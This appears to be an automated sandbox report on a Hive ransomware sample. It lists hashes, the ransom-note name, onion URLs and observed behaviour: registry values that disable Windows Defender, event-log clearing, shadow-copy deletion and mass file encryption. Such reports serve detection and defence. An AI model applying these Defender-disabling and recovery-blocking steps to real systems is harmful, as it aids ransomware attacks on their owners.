Analysis
-
max time kernel
127s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
10-10-2022 19:45
Static task
static1
Behavioral task
behavioral1
Sample
0e4d44dde522c07d09d9e3086cfae803.exe
Resource
win7-20220812-en
General
-
Target
0e4d44dde522c07d09d9e3086cfae803.exe
-
Size
3.9MB
-
MD5
0e4d44dde522c07d09d9e3086cfae803
-
SHA1
d8dc26e2094869a0da78ecb47494c931419302dc
-
SHA256
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
-
SHA512
ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
-
SSDEEP
49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO
Malware Config
Extracted
C:\n8pw_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Hive
A ransomware written in Golang first seen in June 2021.
-
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exepid process 2364 wevtutil.exe 544 wevtutil.exe 3280 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 5100 bcdedit.exe 4992 bcdedit.exe -
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
0e4d44dde522c07d09d9e3086cfae803.exedescription ioc process File renamed C:\Users\Admin\Pictures\OptimizeExpand.png => C:\Users\Admin\Pictures\OptimizeExpand.png.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Users\Admin\Pictures\OptimizeExpand.png.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File renamed C:\Users\Admin\Pictures\UninstallUse.tif => C:\Users\Admin\Pictures\UninstallUse.tif.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Users\Admin\Pictures\UninstallUse.tif.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File renamed C:\Users\Admin\Pictures\InstallResume.png => C:\Users\Admin\Pictures\InstallResume.png.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_KgAAACoAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Users\Admin\Pictures\InstallResume.png.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_KgAAACoAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
0e4d44dde522c07d09d9e3086cfae803.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-24_altform-unplated.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\EmptySearch.scale-200.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser_5.5.0.165303.jar.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_GgAAABoAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_FgAAABYAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\15.jpg 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.2.2_2.2.27405.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-200_contrast-white.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSplashLogo.scale-400.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hr-hr\ui-strings.js.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_OgAAADoAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msdaprsr.dll.mui.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_CAAAAAgAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\Keywords.HxK.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_BgAAAAYAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Exchange.scale-300.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSmallTile.scale-125.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_unshare_18.svg.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad\keypadbase.xml 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\PREVIEW.GIF.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_HgAAAB4AAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ui-strings.js.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\n8pw_HOW_TO_DECRYPT.txt 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Common Files\System\msadc\de-DE\msadcer.dll.mui 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core.jar.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp5-pl.xrm-ms.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_GgAAABoAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookSmallTile.scale-200.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\OutlookMailSmallTile.scale-200.png 0e4d44dde522c07d09d9e3086cfae803.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\n8pw_HOW_TO_DECRYPT.txt 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\am_get.svg.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-40_contrast-black.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\LargeTile.scale-150_contrast-white.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Store.Purchase.Component.winmd 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\PRNDMediaSource.winmd 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\ui-strings.js.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_JgAAACYAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\ui-strings.js.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_HgAAAB4AAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MixedRealityPortalAppList.targetsize-80_altform-unplated_contrast-white.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptyShare-Dark.scale-125.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected]_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\n8pw_HOW_TO_DECRYPT.txt 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-60_altform-unplated_contrast-black.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeBadge.scale-400.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\progress.gif.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_CgAAAAoAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File created C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\ja-JP\n8pw_HOW_TO_DECRYPT.txt 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1 0e4d44dde522c07d09d9e3086cfae803.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\n8pw_HOW_TO_DECRYPT.txt 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_CAAAAAgAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\MixedRealityPortalMedTile.scale-200.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-black_targetsize-20.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_selected_18.svg.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_GgAAABoAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\n8pw_HOW_TO_DECRYPT.txt 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-140.png.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNotebookLargeTile.scale-150.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-96.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-80_altform-unplated.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\Example2.Diagnostics\1.0.1\Example2.Diagnostics.psd1 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubLargeTile.scale-125_contrast-white.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl\Assets\OfflinePages\WebviewOffline.html 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-200_contrast-black.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Grace-ul-oob.xrm-ms.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_OAAAADgAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_IAAAACAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\WINGDNG3.TTF.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ClientLangPack_eula.txt.onC_5l_HJ37xbjmgTMTHenJesNhD0wdPWg9GqRu323L_OgAAADoAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4412 sc.exe 1552 sc.exe 3772 sc.exe 4888 sc.exe 1812 sc.exe 800 sc.exe 4176 sc.exe 2148 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1264 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2340 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exe0e4d44dde522c07d09d9e3086cfae803.exepid process 2704 powershell.exe 2704 powershell.exe 5092 powershell.exe 5092 powershell.exe 3976 0e4d44dde522c07d09d9e3086cfae803.exe 3976 0e4d44dde522c07d09d9e3086cfae803.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 2364 wevtutil.exe Token: SeBackupPrivilege 2364 wevtutil.exe Token: SeSecurityPrivilege 544 wevtutil.exe Token: SeBackupPrivilege 544 wevtutil.exe Token: SeSecurityPrivilege 3280 wevtutil.exe Token: SeBackupPrivilege 3280 wevtutil.exe Token: SeIncreaseQuotaPrivilege 456 wmic.exe Token: SeSecurityPrivilege 456 wmic.exe Token: SeTakeOwnershipPrivilege 456 wmic.exe Token: SeLoadDriverPrivilege 456 wmic.exe Token: SeSystemProfilePrivilege 456 wmic.exe Token: SeSystemtimePrivilege 456 wmic.exe Token: SeProfSingleProcessPrivilege 456 wmic.exe Token: SeIncBasePriorityPrivilege 456 wmic.exe Token: SeCreatePagefilePrivilege 456 wmic.exe Token: SeBackupPrivilege 456 wmic.exe Token: SeRestorePrivilege 456 wmic.exe Token: SeShutdownPrivilege 456 wmic.exe Token: SeDebugPrivilege 456 wmic.exe Token: SeSystemEnvironmentPrivilege 456 wmic.exe Token: SeRemoteShutdownPrivilege 456 wmic.exe Token: SeUndockPrivilege 456 wmic.exe Token: SeManageVolumePrivilege 456 wmic.exe Token: 33 456 wmic.exe Token: 34 456 wmic.exe Token: 35 456 wmic.exe Token: 36 456 wmic.exe Token: SeIncreaseQuotaPrivilege 4796 wmic.exe Token: SeSecurityPrivilege 4796 wmic.exe Token: SeTakeOwnershipPrivilege 4796 wmic.exe Token: SeLoadDriverPrivilege 4796 wmic.exe Token: SeSystemProfilePrivilege 4796 wmic.exe Token: SeSystemtimePrivilege 4796 wmic.exe Token: SeProfSingleProcessPrivilege 4796 wmic.exe Token: SeIncBasePriorityPrivilege 4796 wmic.exe Token: SeCreatePagefilePrivilege 4796 wmic.exe Token: SeBackupPrivilege 4796 wmic.exe Token: SeRestorePrivilege 4796 wmic.exe Token: SeShutdownPrivilege 4796 wmic.exe Token: SeDebugPrivilege 4796 wmic.exe Token: SeSystemEnvironmentPrivilege 4796 wmic.exe Token: SeRemoteShutdownPrivilege 4796 wmic.exe Token: SeUndockPrivilege 4796 wmic.exe Token: SeManageVolumePrivilege 4796 wmic.exe Token: 33 4796 wmic.exe Token: 34 4796 wmic.exe Token: 35 4796 wmic.exe Token: 36 4796 wmic.exe Token: SeIncreaseQuotaPrivilege 4796 wmic.exe Token: SeSecurityPrivilege 4796 wmic.exe Token: SeTakeOwnershipPrivilege 4796 wmic.exe Token: SeLoadDriverPrivilege 4796 wmic.exe Token: SeSystemProfilePrivilege 4796 wmic.exe Token: SeSystemtimePrivilege 4796 wmic.exe Token: SeProfSingleProcessPrivilege 4796 wmic.exe Token: SeIncBasePriorityPrivilege 4796 wmic.exe Token: SeCreatePagefilePrivilege 4796 wmic.exe Token: SeBackupPrivilege 4796 wmic.exe Token: SeRestorePrivilege 4796 wmic.exe Token: SeShutdownPrivilege 4796 wmic.exe Token: SeDebugPrivilege 4796 wmic.exe Token: SeSystemEnvironmentPrivilege 4796 wmic.exe Token: SeRemoteShutdownPrivilege 4796 wmic.exe Token: SeUndockPrivilege 4796 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
0e4d44dde522c07d09d9e3086cfae803.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3976 wrote to memory of 2424 3976 0e4d44dde522c07d09d9e3086cfae803.exe net.exe PID 3976 wrote to memory of 2424 3976 0e4d44dde522c07d09d9e3086cfae803.exe net.exe PID 2424 wrote to memory of 5116 2424 net.exe net1.exe PID 2424 wrote to memory of 5116 2424 net.exe net1.exe PID 3976 wrote to memory of 4004 3976 0e4d44dde522c07d09d9e3086cfae803.exe net.exe PID 3976 wrote to memory of 4004 3976 0e4d44dde522c07d09d9e3086cfae803.exe net.exe PID 4004 wrote to memory of 4676 4004 net.exe net1.exe PID 4004 wrote to memory of 4676 4004 net.exe net1.exe PID 3976 wrote to memory of 1924 3976 0e4d44dde522c07d09d9e3086cfae803.exe net.exe PID 3976 wrote to memory of 1924 3976 0e4d44dde522c07d09d9e3086cfae803.exe net.exe PID 1924 wrote to memory of 2332 1924 net.exe net1.exe PID 1924 wrote to memory of 2332 1924 net.exe net1.exe PID 3976 wrote to memory of 2636 3976 0e4d44dde522c07d09d9e3086cfae803.exe net.exe PID 3976 wrote to memory of 2636 3976 0e4d44dde522c07d09d9e3086cfae803.exe net.exe PID 2636 wrote to memory of 1580 2636 net.exe net1.exe PID 2636 wrote to memory of 1580 2636 net.exe net1.exe PID 3976 wrote to memory of 2808 3976 0e4d44dde522c07d09d9e3086cfae803.exe net.exe PID 3976 wrote to memory of 2808 3976 0e4d44dde522c07d09d9e3086cfae803.exe net.exe PID 2808 wrote to memory of 204 2808 net.exe net1.exe PID 2808 wrote to memory of 204 2808 net.exe net1.exe PID 3976 wrote to memory of 1508 3976 0e4d44dde522c07d09d9e3086cfae803.exe net.exe PID 3976 wrote to memory of 1508 3976 0e4d44dde522c07d09d9e3086cfae803.exe net.exe PID 1508 wrote to memory of 3576 1508 net.exe net1.exe PID 1508 wrote to memory of 3576 1508 net.exe net1.exe PID 3976 wrote to memory of 5004 3976 0e4d44dde522c07d09d9e3086cfae803.exe net.exe PID 3976 wrote to memory of 5004 3976 0e4d44dde522c07d09d9e3086cfae803.exe net.exe PID 5004 wrote to memory of 3532 5004 net.exe net1.exe PID 5004 wrote to memory of 3532 5004 net.exe net1.exe PID 3976 wrote to memory of 3628 3976 0e4d44dde522c07d09d9e3086cfae803.exe net.exe PID 3976 wrote to memory of 3628 3976 0e4d44dde522c07d09d9e3086cfae803.exe net.exe PID 3628 wrote to memory of 4952 3628 net.exe net1.exe PID 3628 wrote to memory of 4952 3628 net.exe net1.exe PID 3976 wrote to memory of 4888 3976 0e4d44dde522c07d09d9e3086cfae803.exe sc.exe PID 3976 wrote to memory of 4888 3976 0e4d44dde522c07d09d9e3086cfae803.exe sc.exe PID 3976 wrote to memory of 1812 3976 0e4d44dde522c07d09d9e3086cfae803.exe sc.exe PID 3976 wrote to memory of 1812 3976 0e4d44dde522c07d09d9e3086cfae803.exe sc.exe PID 3976 wrote to memory of 800 3976 0e4d44dde522c07d09d9e3086cfae803.exe sc.exe PID 3976 wrote to memory of 800 3976 0e4d44dde522c07d09d9e3086cfae803.exe sc.exe PID 3976 wrote to memory of 4176 3976 0e4d44dde522c07d09d9e3086cfae803.exe sc.exe PID 3976 wrote to memory of 4176 3976 0e4d44dde522c07d09d9e3086cfae803.exe sc.exe PID 3976 wrote to memory of 2148 3976 0e4d44dde522c07d09d9e3086cfae803.exe sc.exe PID 3976 wrote to memory of 2148 3976 0e4d44dde522c07d09d9e3086cfae803.exe sc.exe PID 3976 wrote to memory of 4412 3976 0e4d44dde522c07d09d9e3086cfae803.exe sc.exe PID 3976 wrote to memory of 4412 3976 0e4d44dde522c07d09d9e3086cfae803.exe sc.exe PID 3976 wrote to memory of 1552 3976 0e4d44dde522c07d09d9e3086cfae803.exe sc.exe PID 3976 wrote to memory of 1552 3976 0e4d44dde522c07d09d9e3086cfae803.exe sc.exe PID 3976 wrote to memory of 3772 3976 0e4d44dde522c07d09d9e3086cfae803.exe sc.exe PID 3976 wrote to memory of 3772 3976 0e4d44dde522c07d09d9e3086cfae803.exe sc.exe PID 3976 wrote to memory of 3868 3976 0e4d44dde522c07d09d9e3086cfae803.exe reg.exe PID 3976 wrote to memory of 3868 3976 0e4d44dde522c07d09d9e3086cfae803.exe reg.exe PID 3976 wrote to memory of 4948 3976 0e4d44dde522c07d09d9e3086cfae803.exe reg.exe PID 3976 wrote to memory of 4948 3976 0e4d44dde522c07d09d9e3086cfae803.exe reg.exe PID 3976 wrote to memory of 